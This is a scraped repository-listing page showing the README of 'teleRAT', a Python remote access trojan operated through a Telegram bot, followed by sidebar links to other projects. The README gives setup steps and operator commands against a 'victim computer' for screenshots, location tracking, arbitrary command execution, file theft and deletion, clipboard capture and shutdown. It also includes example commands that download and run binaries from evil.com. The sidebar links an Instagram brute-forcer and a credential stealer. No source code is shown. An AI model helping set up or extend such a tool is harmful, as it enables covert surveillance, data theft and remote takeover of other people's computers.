Telegram RAT written in Python

Related tags

Third-party APIs Wrapperspythonmalwareratmalware-researchremote-admin-tool
Overview

teleRAT

Python based RAT that uses Telegram for sending commands and receiving data to and from a victim computer.

Setup.py

  1. Insert your API key into the api variable inside the setup.py script & run it. This will setup your Telegram chat with your created bot with the necessary commands to avoid inserting each command along with the help message.
  • Read here to create your own bot and obtain your API token.
  1. Install necessary requirements: pip install -r requirements.txt
  2. Send a command to your Telegram bot
  3. Run python3 main.py

Available Commands

  • /whoami - returns username. no additional arguments required.
  • /screenshot - takes screenshots. requires the number of screenshots to take (EX: /screenshot 5 <- to take 5 screenshots)
  • /location - returns location info (region, state, zip code, estimated coordinates, timezone, country, ip address)
  • /metadata - returns metadata info about a specified file. requires filepath as an additional argument (EX: /metadata C:\Users\Username\Files\special.java <- will return metadata info about special.java)
  • /execute - executes specified system command. requires 2 additional arguments: the system command and additional arguments to pass to that system command (EX: /execute cmd.exe [/c,ver] or /execute binary.exe none} in order to execute binary.exe with no arguments)
  • /power - allows operator to shutoff, hibernate, or restart computer. requires 1 additional argument: hibernate, pd (to power down), or restart (EX: /power pd <- to power down the victim's computer)
  • /ls - provides operator with directory listing. If no additional argument is provided, it provides directory listing for directory in which malware is. Additional argument of a directory is optional (EX: /ls %APPDATA% <- provides directory listing for APPDATA directory)
  • /delete - deletes a user specified file. Additional argument of filepath is required (EX: /delete C:\Users\Username\Files\temp.txt <- deletes a file named temp.txt)
  • /wreport - provides information regarding the wireless profiles the computer has connected to in the past, the drivers, and a list of wireless interfaces.
  • /remotebinary - download and execute a remote binary. Requires 2 additional arguments: the URL where the binary is and any additional arguments to pass when executing the binary (EX: /remotebinary https://evil.com/file.exe noargs <- execute file.exe with no arguments or /remotebinary https://evil.com/file.exe [-c,-f] <- to execute file.exe with flags c & f)
  • /processes - returns a list of running processes and services
  • /gather - return a specified file. requires 1 additional argument: the filepath (EX: /gather C:\Users\username\important\file.xlsx <- grab and upload file.xlsx to Telegram chat)
  • /report - provides a hardware report & Windows version to operator
  • /playnoise - plays a user specified noise. available list of noises include: asterisk sound (asterisk), exclamation sound (exclamation), exit sound (exit), hand sound (hand), question sound (question), and beep (beep) (EX: /playnoise beep or /playnoise question)
  • /gatherclip - returns data currently copied in the victim's clipboard. requires no additional arguments.
  • /messagebox - will present the victim with a message box. 2 additional arguments are required: caption and title for the window (EX: /messagebox </li> </ul> </article> </div> </div> </div> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" type="3463953c43b18c592a02463e-text/javascript"></script> <ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-2693323733590204" data-ad-slot="1585190487"></ins> <script type="3463953c43b18c592a02463e-text/javascript">(adsbygoogle = window.adsbygoogle || []).push({});</script> </div> <div class="col-lg-4 right"> <div id="basic" class="tab-pane fade show active"> <div class="box shadow-sm rounded bg-white mb-3"> <div class="box-title border-bottom p-3"> <h6 class="m-0">Owner</h6> </div> <div class="d-flex align-items-center p-3 job-item-header"> <div class="overflow-hidden mr-2"> <h6 class="font-weight-bold -dark mb-0 text-truncate"> </h6> <div class="small text-gray-500"> </div> </div> <img class="img-fluid ml-auto" style="border-radius: 50%;" src="https://avatars.githubusercontent.com/u/56985822?v=4&s=60" alt=""> </div> <div class="box-body p-3"> <a href="/repo/gitHubRepo/1d8-teleRAT-python-third-party-apis-wrappers" rel="nofollow" target="_blank" class="btn btn-lg btn-block btn-danger mb-3"><i class="fa fa-github" aria-hidden="true"></i> GitHub Repository</a> </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/kaif-00z-ForwarderBot"><h6 class="font-weight-bold ">A Telegram Bot with(Forwarder Bot + User Bot + More Features ) </h6></a> <p class="mb-0 text-muted"> A Telegram Bot with(Forwarder Bot + User Bot + More Features ) </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/88398455?v=4&s=60" alt="Kaif"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 3 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Feb 16, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/greyhatguy007-insta-non-followers"><h6 class="font-weight-bold ">A script to find the people whom you follow, but they don't follow you back</h6></a> <p class="mb-0 text-muted"> insta-non-followers A script to find the people whom you follow, but they don't follow you back Dependencies: python3 libraries - instaloader, getpass</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/77543865?v=4&s=60" alt="Ritvik"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 5 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jul 03, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/tiktok-bot---fast-optimized-zefoy-script"><h6 class="font-weight-bold ">⚡TIKTOK BOT - FAST OPTIMIZED ZEFOY SCRIPT</h6></a> <p class="mb-0 text-muted"> ⚡ ZEFOY [ TikTok Zefoy Bot ] Get the script in: discord.gg/onlp !! Official shop: onlp.sellix.io Newest version v.9.0.0 Requirements pip install p</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/98614666?v=4&s=60" alt="Tekky"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 186 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 31, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/HCWassim-Flight-Notifier-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Short Program using Transavia's API to notify via email an user waiting for a flight at special dates and with the best price</h6></a> <p class="mb-0 text-muted"> Flight-Notifier Short Program using Transavia's API to notify via email an user waiting for a flight at special dates and with the best price Algorith</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/72025267?v=4&s=60" alt="Wassim"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Apr 10, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/MCMi460-OpenEmuRPC"><h6 class="font-weight-bold ">OpenEmu Discord Rich Presence provided with Python!</h6></a> <p class="mb-0 text-muted"> A simple application that provides your current OpenEmu game as an RPC state in Discord via PyPresence. How to use Unzip and open the latest x86_64 ve</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/32529306?v=4&s=60" alt="Deltaion Lee"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 6 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> May 30, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/actonetor-IGBRUTE-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Brute force instagram account / actonetor, 2021</h6></a> <p class="mb-0 text-muted"> Brute force instagram account / actonetor, 2021</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/87834920?v=4&s=60" alt="actonetor"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 6 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 16, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/l3das-L3DAS22-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">L3DAS22 challenge supporting API</h6></a> <p class="mb-0 text-muted"> L3DAS22 challenge supporting API This repository supports the L3DAS22 IEEE ICASSP Grand Challenge and it is aimed at downloading the dataset, pre-proc</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/81426748?v=4&s=60" alt="L3DAS"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 38 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 25, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/CyberPunkMetalHead-binance-dca-crypto-trading-bot"><h6 class="font-weight-bold ">This is a DCA crypto trading bot built for Binance written in Python</h6></a> <p class="mb-0 text-muted"> This is a DCA crypto trading bot built for Binance written in Python. It works by allowing you to DCA at an interval of your choosing and reports back on your average buy price as well as a chart con</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/45662650?v=4&s=60" alt="Andrei"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 55 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 17, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/huxiaoxu2019-chrotry-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Search all history of Chrome in terminal</h6></a> <p class="mb-0 text-muted"> Chrotry Search all history of Chrome in terminal. Demo Usages Move the Chrome history file to current directory by running move_history.sh Rename hist</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/5491423?v=4&s=60" alt="Xiaoxu HU"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jun 13, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/leonardodalinky-pywmapi"><h6 class="font-weight-bold ">PYthon Warframe Market API(pywmapi)</h6></a> <p class="mb-0 text-muted"> pywmapi PYthon Warframe Market API(pywmapi) API for warframe market, written in Python. For now, the implemented function is listed below: auth sign i</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/30380541?v=4&s=60" alt="AyajiLin"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 7 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 11, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/edgyandcoolname-KikNameChecker"><h6 class="font-weight-bold ">A (probably) working Kik name checker</h6></a> <p class="mb-0 text-muted"> KikNameChecker !THIS ONLY CHECKS WS2.KIK.COM ENDPOINT! \ Will add user inputted endpoints thing \ A (probably) working Kik name checker Started as a s</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/36075211?v=4&s=60" alt="insert edgy and cool name"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 17, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/raveen-2003-zeroimagebot"><h6 class="font-weight-bold ">A simple Telegram bot which handles images in whole different way</h6></a> <p class="mb-0 text-muted"> zeroimagebot thezeroimagebot 🌟 I Can Edit Dimension Of An image which is required by @stickers 🌟 I Can Extract Text From An Image 🌟 !!! New Updates</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/63842813?v=4&s=60" alt="RAVEEN KUMAR"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 4 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jul 01, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/CS-UIT-AI-CLUB-vlp-ic-service-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Image captioning service for healthcare domains in Vietnamese using VLP</h6></a> <p class="mb-0 text-muted"> Image captioning service for healthcare domains in Vietnamese using VLP This service is a web service that provides image captioning services for heal</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/86461101?v=4&s=60" alt="CS-UIT AI Club"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 04, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/InvalidAccount69-MultiAccountGenerator"><h6 class="font-weight-bold "> Multi Account Generator Minecraft/NordVPN/Hulu/Origin And ...</h6></a> <p class="mb-0 text-muted"> Multi Account Generator Minecraft/NordVPN/Hulu/Origin And ...</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/95581741?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 76 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 01, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/KAMKAZEMARCI-python-virus-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">A virus/stealer made in py</h6></a> <p class="mb-0 text-muted"> python-virus A virus/stealer made in py. Features: Discord token stealer, Password stealer, Windows key stealer, Credit-card stealer, Image grab, Anti</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/74118308?v=4&s=60" alt="SKYNETMARCI"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 5 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 12, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/cliegargo-pwy-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">A simple weather information tool.</h6></a> <p class="mb-0 text-muted"> pwy A simple weather information tool. Table of Contents Features Dependencies Installation Usage Update Changelog Credits License Features ASCII art </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/67180945?v=4&s=60" alt="Clint"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 105 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 31, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/PWRScript-PWRCord"><h6 class="font-weight-bold ">Low-level, feature rich and easy to use discord python wrapper</h6></a> <p class="mb-0 text-muted"> PWRCord Low-level, feature rich and easy to use discord python wrapper Important Note: At this point, this library API is considered unstable and can </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/43732860?v=4&s=60" alt="MIguel Lopes"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 26, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/s0md3v-rewise"><h6 class="font-weight-bold ">rewise is an unofficial wrapper for google search's auto-complete feature</h6></a> <p class="mb-0 text-muted"> rewise is an unofficial wrapper for google search's auto-complete feature</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/26716802?v=4&s=60" alt="Somdev Sangwan"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 71 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jul 19, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/BitcoinRaven-Bitcoin-Fair-Value-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">This is simply code for bitcoin fair value. </h6></a> <p class="mb-0 text-muted"> About The Project This is a code for bitcoin fair value, its simply exclude bubble data using RANSAC method, and then plot the results. Check youtube </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/68755455?v=4&s=60" alt="BitcoinRaven"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 4 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Mar 26, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/a-cli-tool-to-transfer-sync-and-backup-playlists-on-music-streaming-services"><h6 class="font-weight-bold ">A CLI tool to transfer, sync, and backup playlists on music streaming services</h6></a> <p class="mb-0 text-muted"> unitunes A command-line interface tool to manage playlists across music streaming services. Introduction unitunes manages playlists across streaming s</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/10098493?v=4&s=60" alt="Victor Tao"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 50 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 07, 2023 </div> </div> </div> </div> </div> </div> <footer class="bg-white"> <div class="container"> <div class="copyright"> <div class="logo"> <a href="/"> <img src="/assets/images/logo_pythonrepo.png"> </a> </div> <p>2022.PythonRepo </p> <ul class="social"> <li> <a href="/about">About</a>   </li> <li> <a href="/contact">Contact Us</a>   </li> <li> <a href="/dmca">DMCA</a>   </li> <li> <a href="/disclaimer">Disclaimer</a>   </li> <li> <a href="/privacypolicy">Privacy Policy</a>   </li> </ul> </div> </div> </footer> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha512-bnIvzh6FU75ZKxp0GXLH9bewza/OIw6dLVh9ICg0gogclmYGguQJWl8U30WpbsGTqbIiAwxTsbe76DErLq5EDQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/js/bootstrap.bundle.min.js" integrity="sha512-Oy5BruJdE3gP9+LMJ11kC5nErkh3p4Y0GawT1Jrcez4RTDxODf3M/KP3pEsgeOYxWejqy2SPnj+QMpgtvhDciQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/js/select2.min.js" integrity="sha512-2ImtlRlf2VVmiGZsjm9bEyhjGW4dU7B6TNwh/hx/iSByxNENtj3WVE6o/9Lj4TJeVXPi4bnOIMXFIJJAeufa0A==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="/assets/js/custom.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> $(function() { $("img.lazy").lazyload({ threshold :180, failurelimit :20, effect : "fadeIn" }); }); </script> <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/highlight.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> hljs.initHighlightingOnLoad(); </script> <script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="3463953c43b18c592a02463e-|49" defer=""></script> <script src="/static/js/jquery-3.6.0.min.js" type="text/javascript"></script> <script src="/adview_pic_cpc_cpm_cpa_guanggao_gg_ads_300x250.js?v=1765085476" type="text/javascript"></script> </body> </html>